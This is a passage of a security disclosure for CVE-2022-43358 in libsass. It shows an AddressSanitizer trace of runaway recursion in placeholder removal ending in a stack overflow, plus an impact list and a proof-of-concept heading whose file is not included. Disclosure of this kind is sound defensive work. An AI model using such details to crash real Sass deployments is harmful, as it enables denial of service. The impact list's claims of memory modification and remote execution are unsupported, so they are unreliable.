    #5 0xa2fa01 in Sass::Remove\_Placeholders::remove\_placeholders(Sass::ComplexSelector\*) src/remove\_placeholders.cpp:42
    #6 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SelectorList\*) src/remove\_placeholders.cpp:52
    ...
    #325 0xa2fa01 in Sass::Remove\_Placeholders::remove\_placeholders(Sass::ComplexSelector\*) src/remove\_placeholders.cpp:42
    #326 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SelectorList\*) src/remove\_placeholders.cpp:52
    #327 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SimpleSelector\*) src/remove\_placeholders.cpp:22
    #328 0xa2ead2 in Sass::Remove\_Placeholders::remove\_placeholders(Sass::CompoundSelector\*) src/remove\_placeholders.cpp:29
    #329 0xa2fa01 in Sass::Remove\_Placeholders::remove\_placeholders(Sass::ComplexSelector\*) src/remove\_placeholders.cpp:42
    #330 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SelectorList\*) src/remove\_placeholders.cpp:52
    #331 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SimpleSelector\*) src/remove\_placeholders.cpp:22

SUMMARY: AddressSanitizer: stack-overflow src/ast\_selectors.cpp:464 in Sass::ComplexSelector::has\_placeholder() const
==3226316==ABORTING

****6\. Impact****

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution.

****7\. POC****

Download: poc3

**Report of the Information Security Laboratory of Ocean University of China @OUC\_ISLOUC @OUC\_Blue\_Whale**

CVE-2022-43358: AddressSanitizer:  stack-overflow src/ast_selectors.cpp:464 in Sass::ComplexSelector::has_placeholder() const · Issue #3178 · sass/libsass

Tag

#dos